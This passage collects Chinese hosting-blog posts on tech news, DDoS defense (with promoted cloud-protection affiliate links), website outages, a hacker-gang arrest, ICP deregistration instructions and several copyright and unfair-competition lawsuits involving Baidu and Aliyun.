此外,为了消除国外用户对个人隐私的疑虑,根据《华为搜索用户协议》,华为搜索服务由华为位于爱尔兰的子公司Aspiegel Limited运营。 业认为,华为搜索最终目的是用来代替谷歌搜索,不过就目前来看,这个说法还为时过早。 #### 咨询百度文心一言如何提高网站流量(此文仅作参考) 要提高网站流量,以下是一些可能的方法: 优化网站内容:提供有价值的内容是吸引用户和增加网站流量的关键。通过提供独特、有趣、有用的内容,可以吸引用户留在网站上,并增加网站的回访率。 优化网站结构:确保网站结构清晰、易于导航,用户可以方便地找到所需的信息。优化网站内链结构,增加重要页面的链接,提高网站地图的质量等都可以帮助用户更好地浏览网站。 增加外部链接:外部链接是指来自其他网站的链接,是提高网站流量和排名的重要手段。与相关网站建立链接关系,增加网站的曝光度,吸引更多用户访问。 利用社交媒体:社交媒体是提高网站流量和品牌知名度的重要渠道。通过在社交媒体上分享网站的内容,增加与用户的互动,可以吸引更多用户访问网站。 制定营销策略:制定有效的营销策略可以帮助扩大网站的影响力,增加网站流量。例如,可以使用电子邮件营销、广告投放、线下宣传等方式来推广网站。 优化关键词:关键词是用户在搜索引擎中输入的用于查找相关内容的词汇。通过优化关键词,可以提高网站在搜索引擎中的排名,从而增加网站的流量。 提高网站速度:网站加载速度是用户体验的重要因素,也是提高网站流量的关键。优化网站代码、缩减图片和视频大小、使用CDN等都可以提高网站加载速度。 增加移动优化:移动设备的使用越来越普遍,优化网站以适应移动设备的需求变得越来越重要。通过增加移动优化,改善用户体验,提高网站的流量。 请注意,提高网站流量需要时间和耐心。通过持续不断地优化和改进,才能获得稳定的增长。 #### 哔哩哔哩网站故障啦 7 月 2 日消息,大量用户反馈,B站(哔哩哔哩)平台今日上午出现服务问题,视频评论区和用户(UP 主)主页都无法加载,网站许多页面无法正常显示。 主机吧测试了下,发现番剧、电视剧等多个栏目无法正常打开。 用户评论也一直显示加载中 距离故障已经一个多小时过去了,还没有恢复,这不得损失几百万? #### 哪些软件可以防止DDOS攻击? DDoS(分布式拒绝服务攻击)防御通常需要使用多种软件和工具来保护系统免受攻击。 以下是一些常用的DDoS防御软件: ModSecurity:开源的Web应用程序防火墙,可以防御Web层的DDoS攻击。 Fail2ban:可以监视日志文件并自动阻止来自恶意IP地址的流量。 Snort:开源的入侵检测和预防系统,可以监视网络流量并检测和防止DDoS攻击。 Nginx:可以用作反向代理服务器和负载均衡器,并使用限速等功能防止DDoS攻击。 Apache:可以使用模块,如mod_evasive和mod_security等来防止DDoS攻击。 需要注意的是,软件并不能完全防御DDOS攻击,只能防御小量的DDOS请求类的攻击,完全防御住DDOS还需要专业云防火墙进行清洗防御。 主机吧推荐云防火墙: 百度云加速 百度云加速是百度旗下为网站提供一站式加速、安全防护和搜索引擎优化的产品。提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。 优惠链接https://zhujib.com/yunjiasu.html 京东云星盾SCDN 京东云星盾SCDN安全加速(SCDN,Secure Content Delivery Network),是京东云推出的一体化分布式安全防御产品,提供免费 SSL 证书,集成 Web 攻击防护、CC 攻击防御、BOT 机器人分析,并将内容分发加速能力融于一身。在边缘节点注入安全能力,形成分布式的安全加速网络,让您的业务更安全、体验更流畅。适用于所有兼顾安全和内容加速的业务。 优惠链接:https://zhujib.com/jdxingdun.html #### 哪吒汽车官网已无法正常访问,显示“系统维护中” 1月6日消息,正在破产风口浪尖的哪吒汽车官网,今日有多个车主反馈官网无法正常访问,显示“系统维护中”。 截至目前为止,官方微博也没有任何说明。 此前已经停摆一个月有余的哪吒汽车桐乡工厂将于 2025 年 1 月 4 日全面复工,目前相关生产人员已接到通知。该厂主要生产哪吒 L 和哪吒 S 猎装版,复工复产后将主要保障该两大车型的国内供应。哪吒汽车目前有 3 个工厂,位于广西南宁、江西宜春、浙江桐乡。其中,南宁工厂主产哪吒 X 及供应国际市场的车型,宜春工厂则主要生产哪吒 S 和哪吒 GT。去年 11 月,哪吒汽车被曝出大规模裁员、工厂停摆等消息;12 月 6 日,哪吒汽车宣布因公司战略,张勇不再担任首席执行官,转任公司顾问,创始人、董事长方运舟兼任首席执行官。 #### 商城网店遭到DDOS攻击怎么办 相信很多个人企业网站都有遭遇DDOS攻击的经历,DDOS就像是网络群殴,竞争对手雇了一群“僵尸”对你的业务网站人肉攻击,目的是打到网站瘫痪。大公司一般都有钱有人力来应对这种网络群殴,但创业公司就很受伤。 特别是一些在线交易商城网店如果遇到DDOS攻击,受伤非常严重。 如何应对 DDoS 攻击 面对来势汹汹的 DDoS 攻击,我们应该如何应对? 现在比较普及的应对 DDoS 攻击的方法: 使用高防服务器; 设置黑名单; DDoS 流量清洗; 使用 CDN 加速; …… 高防服务器 主机吧拿开的重庆火锅店举例,高防服务器就是主机吧给重庆火锅店增加了两名保安,这两名保安可以让保护店铺不受流氓骚扰,并且还会定期在店铺周围巡逻防止流氓骚扰。 高防服务器主要是指能独立硬防御 50Gbps 以上的服务器,能够帮助网站拒绝服务攻击,定期扫描网络主节点等,这东西是不错,就是贵,一般网站是用不起的。 黑名单 面对火锅店里面的流氓,主机吧一怒之下将他们拍照入档,并禁止他们踏入店铺,但是有的时候遇到长得像的人也会禁止他进入店铺。这个就是设置黑名单,此方法秉承的就是“错杀一千,也不放一百”的原则,会封锁正常流量,影响到正常业务。 DDoS 清洗 DDoS 清洗就像是给火锅店门口装个安检系统,这个安检秒统会智能识别客户与流氓,客户就放进来,流氓就请拒绝进来。DDoS 清洗会对用户请求数据进行实时监控,及时发现DOS攻击等异常流量,在不影响正常业务开展的情况下清洗掉这些异常流量。 CDN 加速 CDN 加速,我们可以这么理解:为了减少流氓骚扰,主机吧干脆开启多个分店模式,而总部隐藏起来,分店的食物均由隐藏起来的总部统一配送,把流氓给分散开来,就造成不了威胁了。 在现实中,CDN 服务将网站访问流量分配到了各个节点中,这样一方面隐藏网站的真实 IP,另一方面即使遭遇 DDoS 攻击,也可以将流量分散到各个节点中,防止源站崩溃。 百度云加速安全防护,全面保护网站安全 讲了这么多,预防 DDoS 攻击的方法还有很多,这主要也是由于 DDoS 攻击的复杂性,单一的防护手段无法全面抵御 DDoS 攻击。 做完科普工作,请允许我做个小广告,接下来跟大家介绍一下百度云加速安全防护方案,目前百度云加速安全防护基于百度 CDN 网络,为客户提供 DDoS 防护、CC 防护和 WAF 防护等服务,全网实时下发规则,秒级生效,致力于帮助用户构建稳定、高效、全面的互联网安全保障。 针对 DDoS 攻击,百度云加速安全防护拥有强大的流量攻击防护能力,具备1Tbps的压制能力的抗D中心,拥有自有DDoS/CC清洗算法,可有效帮助网站防御SYN Flood、UDP Flood、ICMP Flood、TCP Flood、Connections Flood、Proxy Flood、CC等常见的洪水攻击。从而彻底解决了中小型网站在面对DDoS攻击时预算不足的尴尬,也为所有防护网站的稳定运行提供保障。 百度云加速安全防护拥有国内超过20个超级节点,并与国外知名安全公司CloudFlare合作,调度海外超过30个节点进行防护。 百度云加速 CDN 网络能够隐藏源站地址,避免源站被 DDoS 流量直接攻击,确保源站的访问正常; 百度云加速安全防护部署了多个高防服务器,具有较强抗攻击、抗干扰、安全性能好的特性,帮助网站直接拒绝 DDoS 攻击; 调度平台将攻击流量牵引至超级清洗节点清洗,并将清洗后的流量回源到服务器,确保正常流量的访问。 在攻击数据分方面,百度云加速安全防护能够实现实时上报、分析 DDoS 攻击的监控数据,通过定期扫描、动静态过滤等手段有效帮助客户构建稳定、高效的安全保障。 #### 嚣张黑客团伙被端 涉案 30 多亿、作案 300 起 近日,山东烟台网安部门打掉一有组织牟取非法利益的黑客犯罪团伙。 案情来源 2022年11月下旬,山东烟台某网络科技有限公司报案,称其公司在网络上架设的数字藏品网站遭受黑客攻击,网站后台无法正常登录,同时存有17万网站会员信息及数字藏品交易数据的数据库被人清空,导致网站无法正常运营,受损会员近万人。网站主页也被署名“XX安全团队”的网页替换。对方以恢复网站数据名义向网站运营人敲诈勒索人民币50万元。 案件侦办 烟台网警随即开展侦查工作,发现国内多家网站被该黑客组织植入木马病毒。因案情重大,烟台网警会同芝罘警方成立专案组,由省公安厅挂牌督办。在部、省两级网安部门的精心指导下,专案组抽丝剥茧、固定证据,持续推进工作开展:一方面,对案发过程开展复盘,全面掌握犯罪线索;另一方面,加强技术研判,查明了犯罪团伙的组织脉络。 抓捕收网 近日,专案组在部、省两级网安部门统一指挥下,在江苏、安徽等地警方的大力配合下,集中开展收网抓捕行动,成功打掉以犯罪嫌疑人王某为首的黑客犯罪团伙。 经查,自2021年以来,以王某为首的黑客犯罪团伙,通过网络渗透等攻击手段连续作案300余起,受害网站遍布国内十余省市地区,涉案金额超过30余亿元。 黑客攻击主要手法: 一是DDOS攻击。使用大量数据包消耗服务器可用资源,致使网络服务瘫痪 二是网络勒索病毒。以邮件、木马程序、网页诱饵等形式发送给目标用户并引诱其点击,待用户电脑感染病毒后即启动特定加密算法锁定用户数据。 三是控制僵尸网络。采用一种或多种传播手段,使被攻击主机感染僵尸程序病毒,从而控制大量主机,开展窃取数据等不法行为。 网警提示:广大用网单位要增强网络防范意识,提高技术防护能力,及时修补网络漏洞,从逻辑和规则上减少网络“黑客”的侵犯。 #### 四川省ICP用户注销备案申请表.doc 填表须知 (本页是填表须知,不必打印,请只打印申请表,另附上相关证件一并提交) 1、本申请表仅用于备案号为“蜀ICP备”开头的备案信息,若备案号(主体)为四川省以外的,请联系相关省通信管理局处理。 2、申请类别以实际情况进行选择,注销本单位备案信息的请勾选“注销本单位备案”;注销其他单位备案信息的请勾选“注销他单位备案”。 3、按申请依据可分主体依据与域名依据两种,注销申请时请对应具体情况说明原因。 ①主体依据,即主体冲突,是由单位名称、证件号重复备案引起的。 ②域名依据,即域名冲突,是由域名重复或域名过期备案引起的。 4、请检查所填写的备案信息(如域名、主办单位名称或证件号码等)是否正确;如备案填写无误,仍提示重复(冲突),请先确定是主体冲突还是域名冲突,并在https://beian.miit.gov.cn/的“ICP备案查询”中,查询该信息已被哪个备案主体使用,再根据查询结果填表。 5、请根据以上情况使用A4打印纸打印《注销、删除备案申请表》,纸张不符、证件不全、未准确清晰完整填写者,视为无效处理。 6、注销备案相关资料: ①盖有公章的申请表(个人签字)图片; ②单位有效证件(如企业提供企业营业执照副本彩件,个人则身份证彩件等)图片; ③单位法人有效证件(身份证、台胞证、护照等彩件)图片; ④域名注册证书(用于证明域名现在归申请人所有,由域名注册商提供) 注销本单位备案,请提供资料①②③ 注销他单位备案,请提供资料①②③④ 7、发送方式:通过四川网站备案咨询网www.028icp.com网上提交,我们将在5个工作日内通过邮件等方式给予答复。具体提交方式及操作说明,请参见:http://www.028icp.com/article.asp?id=113 8、自收到申请后给予处理,请申请人自行在https://beian.miit.gov.cn/的“ICP备案查询”核实处理结果。 #### 四川省网站ICP用户注销(删除)备案申请表.doc 填表须知 (本页是填表须知,不必打印,请只打印申请表,另附上相关证件一并传真)   本申请表仅用于遗忘密码的备案用户注销备案,若有密码请通过接入服务商企业侧系统自行提交注销申请。 申请类别以实际情况进行选择,注销本单位(个人)备案信息的请勾选“注销本单位备案”;注销其他单位(个人)备案信息的请勾选“注销他单位备案”。 按申请依据可分主体依据与域名依据两种,注销申请时请对应具体情况说明原因。 主体依据,即主体冲突,是由证件号重复备案引起的。 域名依据,即域名冲突,是由域名重复备案引起的。 请检查所填写的备案信息(如域名,主办单位证件号码等)是否正确;如备案填写无误,仍提示重复(冲突),请先确定是主体冲突还是域名冲突,并在备案管理系统beian.miit.gov.cn的“公共查询”中,查询该信息已被哪个备案主体使用,再根据查询结果填表。 请根据以上情况使用A4打印纸打印《注销、删除备案申请表》,纸张不符、证件不全、未准确清晰完整填写者,视为无效处理。 注销备案相关资料: ①盖有公章的申请表(个人签字) ②单位有效证件(如企业提供企业营业执照副本复印件,个人则身份证复印件等) ③个人域名注册证书(用于证明域名现在归申请人所有,由域名注册商提供) 注销本单位或本人备案,请提供资料①② 注销他人备案,请提供资料①②③ 发送方式:通过四川网站备案咨询网028icp.com网上提交,具体提交方式及操作说明,请参见:http://www.028icp.com/article.asp?id=113 自收到申请后给予处理,请申请人自行在备案系统beian.miit.gov.cn“公共查询”核实处理结果。 10.各接入商联系电话见“相关下载”内。 #### 四维图新起诉百度地图、360地图侵权 共索赔超3亿元 7月30日 消息:据知产北京公众号消息,近日,北京知识产权法院通过北京法院“云庭审”平台,先后公开开庭审理了涉电子地图侵权纠纷系列案件。 系列案件一  四维图新公司诉百度公司侵害著作权及不正当竞争纠纷、著作权许可使用合同纠纷两案 系列案件二  四维图新公司诉奇虎公司等侵害著作权及不正当竞争纠纷上诉案 四维图新公司在上述案件中均诉称被告擅自使用其拥有著作权的电子地图作品,主张的赔偿金额总计超过 3 亿元。 在系列案件一中,四维图新公司诉称:四维图新公司是全国领先的数字地图内容及综合地理信息提供商,与百度公司曾有合作。 但在双方合作期内,被告百度网讯公司等超出合同约定范围,在具有车载导航功能的“CarLife”、“百度导航”的手机应用上使用原告的涉案电子地图产品,构成违约;并且在双方合作终止后,仍通过手机端、车载终端等途径向公众提供涉案电子地图,严重侵害了原告就其电子地图作品享有的复制权、信息网络传播权等权利,同时构成不正当竞争行为,给原告造成了巨大的经济损失。 据此,请求法院判令百度网讯公司等承担停止侵权、消除影响的责任,并在两案中合计主张 2 亿元的赔偿金额。 被告百度网讯公司等辩称,“百度地图”等应用中的地图由其独立完成,并不存在侵权的情形;其合同期内推出的相关应用亦不属于车载终端及车载相关的应用,请求法院判决驳回原告的全部诉讼请求。 关于系列案件二,四维图新公司在一审中诉称:四维图新公司对涉案电子地图产品享有完整的著作权。 被告秀友公司未经许可,将涉案电子地图产品变相转卖给奇虎公司,奇虎公司擅自在其经营的“ 360 搜索”网站和“ 360 搜索”APP中使用涉案电子地图产品,立得公司使用上述地图数据并送审测绘局,构成侵权。三被告的行为违反了诚实信用原则及公认的商业道德,其对外宣称所用电子地图数据已获得授权的行为同时构成虚假宣传。 据此,请求法院判令三被告承担停止侵权、消除影响的责任,并赔偿原告经济损失 1 亿元及合理支出 100 万元。 一审法院经审理认为,结合在案证据无法查明原告主张的地图作品中的具体内容,奇虎公司对 360 地图产品的信息标注、秀友公司等发布的声明亦不构成虚假宣传或违反诚实信用原则的行为,据此驳回原告的诉讼请求。 四维图新公司不服一审判决,提起上诉。 #### 回顾2017年全球网络安全大事件 央视曝光个人信息泄露网上贩卖新闻 央视曝光了一则关于个人信息泄露网上贩卖的新闻,掀起民众对个人隐私被泄露的担忧,感觉到危机重重。据央视记者发现贩卖个人信息的黑市在网络上十分活跃,一些信息贩子甚至公然叫卖,只要提供一个人的手机号码,就能查到他最为私密的个人信息,包括身份户籍、婚姻关联、名下资产、手机通话记录等等,甚至信息贩子声称可以通过三网定位就是移动、联通和电信的手机定位,可以实时定位这些手机用户的位置。 二 贝克汉姆身陷邮件门事件 一份关于足球名宿大卫.贝克汉姆的秘密文件被欧洲调查合作组获取,随着秘密被公诸于世,贝克汉姆的高大正面形象轰然倒塌。据国外媒体爆料称:欧洲新闻调查协作组织截获了贝克汉姆与其亲信的诸多邮件。邮件中,贝克汉姆被曝光做慈善的主要目的是为了获得爵士头衔,他还在邮件中大爆粗口,这对小贝热心公益的好名声无疑是一次沉痛打击。 三 58同城:招聘信息公开售卖 58同城被爆700元即可采集全国简历信息。众网友表示近年被类似信息泄露刷掉了多少安全感?由于全国58同城招聘网对求职者简历毫无防护,平台存在多个漏洞,黑客通过采集工具就能轻易获取后台数据,甚至有商家在网上出售700元一套的爬虫软件,可采集全国430多个城市,以及464个职业的简历数据。 四 云服务商Cloudflare的流量泄漏漏洞 今年初谷歌研究人员披露了云服务商Cloudflare的流量泄漏漏洞,全球有超过550万网站上亿用户受到影响。一些会话、密码、私人消息、API密钥和其他敏感数据被Cloudflare随机泄露给了访问者,甚至被搜索引擎缓存或已被黑客收集。由于该漏洞与心脏出血(Heartbleed)的原理类似,因此被称为”Cloudbleed(云出血)”,这成为历史上最大的网络安全事件之一。 五 上亿优酷信息数据在暗网售卖 外媒hackread爆料,一个名为CosmicDark的供应商在暗网售卖优酷的数据库,该数据库包括了100759591条优酷用户账户信息。 据hackread报道,该数据库在2016年泄露,今年暴露在互联网上,目前并不清楚这个数据库是如何被盗走的,CosmicDark将该数据库的售卖价格定为300美元,折合比特币0.2559,人民币2065.56元。 六 12306官方网站再现安全漏洞 有媒体发现在12306官方网站订票时,当退出个人账号,网站页面竟自动转登他人账号,且与账号相关联的身份证号、联系方式等个人信息均可见,随后记者在该页面点击常用联系人选项时页面再次刷新并显示他人账号及账号涵盖的所有信息。而记者尝试在网站账户页面的个人信息栏等其他选项进行操作,点击进入后均得到不同的个人身份信息。 七 法国总统大选,马克龙在邮件门中劣势胜出 今年5月法国大选中,当时为总统候选人的马克龙竞选团队表示,他们遭到了大规模电脑黑客袭击,竞选邮件被黑客盗窃并上传到网上。其实这些文件只体现了总统竞选活动的正常运作,但社交媒体上披露的真实文件当中掺杂了假文件,目的是散布“怀疑情绪和不实消息”。但是马克龙并未因此受影响,最终仍击败对手成为法国新一任总统。 八 国字号某App的H5遭遇流量劫持 某国字号的App遭遇流量劫持的传闻在业界流传。有消息称,该App某H5页面被植入色情内容广告,经排查“基本确定为用户当地运营商http劫持导致H5页面被插入广告……” 九 我国首部网络安全法正式实施《网络安全法》 今年6月《网络安全法》正式实施,成为我国第一部规范网络空间秩序的基础性法律。《网络安全法》明确了对个人信息收集和保护的要求,提出了个人信息保护的基本原则和要求,并对加强个人信息保护和惩治非法买卖个人信息等做出了明确规定。 十 央视调查发现大量家庭摄像头被入侵 央视《每周质量报告》调查发现网上有众多家庭摄像隐私在售,黑客利用弱口令密码大范围扫描家用摄像头进行破解,可获得IP地址和登录密码,远程操作别人家的摄像头。随后在质检总局的抽检中,采样品牌涵盖市场关注度前5位产品的情况下,40批次产品中有32批次存在安全漏洞,占比高达80%。 十一 五角大楼AWSS3配置错误致18亿用户信息泄露 美国五角大楼托管的 3 台亚马逊 AWS S3 服务器 “centcom-backup”、“centcom-archive”与“pacom-archive” 因配置错误,导致任何未经授权的用户均可公开访问。此举严重影响了公民隐私与自由问题。此外,研究人员也不清楚在线暴露的数据是否已被黑客访问,但他们极其担心黑客会在访问后对境外网民进行暴力攻击。这已经不是亚马逊 AWS S3 因配置错误引发的第一起数据泄露事件了。 十二 美国陆军及NSA情报平台约100G文件暴露在 AWS S3 存储服务器上 事件中维克利发现的这个错误配置的S3存储桶,只要输入正确的URL,任何人都能看到AWS子域名“inscom”上存储的内容。包含有47个文件和目录,其中3个甚至任由下载。存储桶中的3个可下载文件,证实了这些内容的高度敏感性,暴露了国家安全数据,其中一些明显是机密的。” 百度安全回顾2017 网络安全对于个人、企业、国家都有着深远影响。在互联网时代高速发展的今天,我们可以充分享受互联网带所来的便利——它使我们的生活更加丰富、便捷,工作效率更高、更好。但是,互联网并不是一片净土,在我们享受互联网所带来的乐趣与便利,同时也受到日益严重的网络安全威胁,如黑客入侵、病毒干扰等,由此而引发的骨牌效应将严重阻碍互联网发展,我们必须认真对待和妥善解决网络安全问题。 #### 因CorelDraw盗版软件睿派克论坛站长被抓 11月3日 消息:2020年4月份,国内知名的绿色软件分享论坛睿派克宣布永久关闭的消息让不少人感到惋惜。而关闭的原因则跟睿派克站长此前卷入一起关于淘宝卖家售卖CorelDraw盗版软件事件有关。 事件起因是,2019年,思杰马克丁发现在扬州有图文打印商使用盗版软件,随即向当地警方报案。随后,警方相继盘查了图文打印商店和侵权售卖软件淘宝店。进一步调查得知,淘宝卖家手上的盗版软件是从睿派克下载的,而这也导致睿派克论坛站长被抓捕,那么后续情况又如何呢? 日前,睿派克论坛站长(知乎账号:三幺哥)在知乎上详细的分享了自己当时被抓捕以及后续处理的详细经过。 据睿派克论坛站长描述,在抓获淘宝店铺后,该店主承认他贩卖的CoreDraw破解软件并非自己破解,而是从他的那个睿派克论坛下载,这样民警就在19年10月份的时候打开论坛进行了一番证据搜集(他们截取了当时论坛不少页面的截图,大约有二十多张),随后搜集到站长本人的身份信息。 2020年7月16日,警方到他家中宣布了他涉及侵犯苏州思杰马克丁代理的CorelDraw软件的版权,依法对其进行刑事侦查。在弄清楚大概的“非法所得”后,警方扣押了该站长的银行卡和电脑。之后,睿派克论坛站长缴纳3000元取保候审保证金,退还“非法所得”17万中的2万元后,被取保候审。 睿派克论坛站长在文中表示,“扬州的民警搞错了很多信息,将我视为淘宝店主的技术支持。这极有可能是那个被抓的淘宝店主为了“戴罪立功”说了假话,谎称我和他认识,并提供破解的技术支持、是他的顶头老板之类的,目的是想减轻他的责任。”由于那个淘宝店主的撒谎,睿派克论坛站长也被定性为“在逃”人员。 2020年7月18日,其本人为了配合公安机关调查,前往扬州就案件去报到。在这次报到审问时,扬州民警从他的电脑里提取出了数据库,并找到了论坛的一些关键信息。 2020年12月份,根据扬州民警通知,该案件已经移交检察院。2021年7月上旬,扬州检察院找睿派克论坛站长进行了案件的补充询问和侦查,同时派出所对其“非法所得”再次进行了核实,最终定为10万余元。 2021年10月,检察院决定对睿派克论坛站长不予起诉,涉案由于“事实不清、证据不足”,被不予起诉,没有留下什么案底。 在经历这个事件之后,睿派克论坛站长有了新的打算,他表示“目前我将竞选村委会副职,为国家“乡村振兴”计划作贡献。不会再去碰什么软件的修改打包。” 如果你对睿派克论坛站长被抓捕的那些事情详细经过感兴趣的话,可点击这里查看本人详细分享。 #### 因DNS解析流量异常 阿里云CDN挂了 2021年12月7日早上,有使用阿里云CDN用户反馈,阿里云 CDN 挂了!经查询,是因为CDN的DNS解析故障所致,阿里云也发布了官方公告:  北京时间2021年12月7日8:38起,阿里云监控发现部分域名访问异常,阿里云工程师初步确认是CDN DNS解析因异常流量导致,阿里云工程师正在紧急处理,目前解析异常大面积已恢复,阿里云监控正在确认异常恢复情况。这次故障引起了一堆站长在微博的反馈:可见阿里云CDN使用量还是非常多的,IDC 数据显示:2019 年阿里云位居 CDN 市场第二位,市场份额 18.9%。现在是2021年快22年了,应该已经占据市场第一位了。 #### 因上班电脑被监控含3小时腾讯视频挨扣钱 现在在公司上班电脑不敢乱登东西,因为你公司的电脑都是被监控的,上网的一切行为都是可以看到的。 比如以下这位站长,监控显示腾讯视频在线3小时挨扣钱。 从上面的聊天记录我们可以看到,这位站长反应被没有浏览腾讯视频,但是监控显示有腾讯视频在线3小时。 不管有没有,监控员工工作的行为,挺恐怖的,目前一般的路由器都有监控功能。 #### 因不正当竞争,阿里云被判赔付射手科技 6 万元 原告:射手科技(珠海)有限公司被告:阿里云计算有限公司被告:知域互联科技有限公司射手科技向法院提出如下诉讼请求: 1、判令两被告立即停止侵害原告著作权的行为,删除所有侵权页面及链接、小程序;2、判令两被告立即停止不正当竞争行为,删除所有不正当竞争页面及链接、小程序;3、判令两被告连带赔偿原告经济损失10万元;4、判令两被告连带赔偿原告为维权支出的合理费用22400元;5、本案诉讼费用由两被告承担。原告的事实和理由:射手科技(珠海)有限公司于2018年5月16日成立。公司经营范围包括:从事计算机软件领域内的技术开发、技术咨询、技术服务,商务信息咨询(除经纪),通讯工程,计算机网络工程,计算机、软件及辅助设备(除计算机信息系统安全专用产品)销售等。射手自主研发“自记账”系统软件,2020年4月30日公开发布公测,并针对“自记账”系统陆续制作了《如何导出农业银行回单(PDF文件)一图文教程》《如何导出农业银行明细(Excel文件)一图文教程》类似原创系统操作教程文章N篇,并发布于“自记账”系统网站上,网址为“https://www.zijizhang.com/helpcateId=17&page=3”。2021年1月18日,原告发现被告阿里云公司在其公司网站(网址:×××.com/knowledge_list/196933.htmlspm=a2c4g.11186623.6.549.572f4f65NU4szs)的“智能记账工具”模块发布的众多教程等文章与原告创作的文章内容、版面布局、编排方式基本一致,与原告享有著作权的作品构成实质性相似,基本属于抄袭原告的文章。例如,被告发布的《建设银行电子回单导出(PDF文件)—图文教程》《建设银行明细导出(Excel表格)—教程》《税盘如何导出销项电子普通发票PDF?》中使用的操作案例图片中涉及到的“案例时间、案例账号【射手科技(珠海)有限公司】、马赛克的位置和形状”与原告发布的《建设银行导出电子回单(PDF文件)—图文教程》《建设银行导出交易明细(Excel表格)—图文教程》《税盘如何导出销项发票PDF?仅限电子普通发票一图文教程》完全一致,可以认定被告完全抄袭了原告发布的文章内容。同时,在被告阿里云公司网站(网址:×××.com/product/aisaasspm=5176.14153562.J_5132690340.2.2d1a4e55tpPK55)用支付宝扫一扫即可进入被告知域互联公司开发的“智能财税小程序”;在被告知域互联公司的小程序中,也存在被告阿里云公司网站上完全一致的全部教程。如前所述,两被告网站及“智能财税小程序”上的文章与原告创作的文章内容、版面布局、编排方式基本一致,与原告享有著作权的作品构成实质性相似,基本属于抄袭原告的文章。另外,“智能财税小程序”应用界面也与原告自记帐应用APP界面设计、编排相近似;足以让相关受众混淆,同样侵害了原告的著作权。另外,原告作为第一家研发面向中小企业的“智能记账”系统的企业,经过两年多的潜心研发,拥有完全自主知识产权。两被告与原告在“智能记账工具”领域,所涉的服务内容完全一致,所针对的客户对象范围基本一致;且两被告全面抄袭、仿冒原告的上述文章的内容、版面、编排方式,并用于与原告相同的记账系统产品的宣传;另外,“智能财税小程序”应用界面也与原告自记帐应用APP界面设计、编排相近似;足以让相关受众混淆;被告存在引起相关公众的混淆误认的故意,构成不正当竞争行为。还有,两被告存在关联关系,其中被告知域互联公司是被告阿里云公司的全资孙公司,两者具有共同侵权的故意和条件。原告认为,被告未经权利人的授权,擅自在经营网站发布原告创作网络文章,违反了《中华人民共和国著作权法》第五十三条第一款第(一)项之规定。同时,根据《中华人民共和国反不正当竞争法》第六条第(三)款之规定,被告未经许可,擅自使用原告已经发布并具有一定影响力的网络文章及智能记账应用程序,并用于与原告相同的记账系统产品及宣传,已构成不正当竞争行为,应当依法赔偿权利人损失。综上所述,原告为了维护自己的合法权益,现依法向贵院提起诉讼,请求贵院依法裁判,维护原告的合法权益,结合国家大力鼓励创新,再三强调要加大知识产权侵权惩罚力度,显著提高违法成本,把法律威慑作用充分发挥出来的精神,作出公正判决。两被告庭前提交书面答辩状,称: 一、原告主张被侵权的“作品”并非我国著作权法意义上的作品,不享有著作权,两被告的行为不构成著作权侵权。1、我国著作权法明确列明了其保护的作品类型。原告起诉状中称涉案作品为其创作的文章,而《中华人民共和国著作权法实施条例》第四条规定,著作权法保护的文字作品指小说、诗词、散文、论文等以文字形式表现的作品。根据原告提供的证明材料可知,原告所称的“文章”为图文结合的形式,为机械的银行系统页面截图加上少量的指引操作的简单指示,并不属于我国著作权法保护的以文字形式表现的文字作品类型。因此,原告主张被侵权的“文章”并非我国著作权法意义上的作品。2、原告主张被告阿里云公司网站和被告知域互联公司小程序的文章与原告创作的网络文章构成实质性相似,侵害原告的著作权。根据《中华人民共和国著作权法实施条例》相关规定,著作权法保护的作品应具有独创性。根据原告提交的涉案作品截图可知,其作品采用“大量图片+少量文字描述”形式,图片均为我国各大商业银行固有的系统页面的截图,且排列也与各银行系统操作流程顺序一模一样,不存在特别的选择与编排;而文字描述部分为少量的机械的指引步骤,是对各银行固有的系统操作流程方法进行的简单文字描述。涉案文章中的银行流水单导出方法为各大银行系统的程序规则自动设置而成,并非原告创作完成,原告对导出方法的表达不存在任何的艺术加工,也不具备独特的表达形式。同理,涉案文章本身也只是一种机械的表达银行流水单导出方法的操作教程,该教程仅为实现获取银行电子回单之目的,其表达方式有限且缺乏自主创作或设置空间,其本身亦不具备任何的独创性。同时,原告所指的案例时间为银行系统后台自动形成,原告对此没有进行过任何创作行为。图片上的特殊字符也为第三方软件文本编辑器自带符号,放置于图片上也仅是对已有的操作方法起到指示功能,不具有任何创造性的表达。因此,原告主张的被侵权“作品”不具有著作权法意义上的独创性,该“作品”不构成我国著作权法所保护的作品。3、退一步讲,即使原告主张的“作品”构成我国著作权法所保护的作品,两被告的行为也不构成著作权侵权。(1)判断是否构成著作权侵权的标准是两者是否为实质性相似,而判断是否构成实质性相似是以两者间具有独创性的表达部分进行对比。两被告与原告作品中的银行系统页面截图均为各商业银行网站自身固有的系统页面,如该部分构成著作权法保护作品,该部分权利人应为各大银行,在对比时应予以排除;剩余的文字描述部分,由于各银行对其文件导出等行为都设定了具体规则,对银行系统页面操作的方法有且只有一种,为达到指引用户下载或导出文件的目的,对该操作方法的描述方式极为有限。任何人想要做出指引用户下载或导出文件的文章,都只能选择同样的图片,相似甚至相同的表达,并不存在个体化的差异。如果允许对指引导出文件的表达方式享有著作权则意味着其他人在遇到相同问题时,都不能再使用相同或相似的表达方式,实质上会造成思想垄断。因此,该部分表达不应受到著作权法保护。根据著作权案件“抽象概括法”裁判思路,需在剔除掉思想、共有以及有限的表达部分后,对剩余具有独创性的内容进行近似性对比。本案中,在剔除掉截图图片以及起到指引用户下载或导出银行文件的目的之必备描述后,原告只剩下指引用户继续将文件导入到自身的app的描述,而两被告的文章并不涉及该部分。因此,两作品并不构成实质性相似,两被告的行为不构成著作权侵权。涉案文章中有大量的图片,图片均为固有的银行网银系统操作流程页面截图,根据著作权法相关规定,如无相反证明,在作品上署名的法人为作者。因此,图片的原始著作权人应为相关商业银行。同理,涉案文字部分为流水单导出规则,该规则也由相关商业银行专属制定,原始著作权人亦为相关商业银行。在此情形下,原告无权主张两被告侵犯了其文章著作权。4、关于原告诉称被告知域互联公司的“智能财税小程序”应用界面也与原告自记账应用APP界面设计、编排相近似,足以让相关受众混淆,同样侵害了原告的著作权。首先,“智能财税”小程序系被告知域互联公司自主研发和设计,不存在侵犯他人权益的事实。而且,原告并未对“智能财税”小程序与原告app界面构成实质性相似进行举证。其次,原告主张该小程序界面设计侵权与原告在本案主张的文章作品侵权无关,不属于本案审理范围,应当另行立案主张,本案中应当依法驳回原告该部分起诉。二、两被告的行为是为了社会公共利益,不会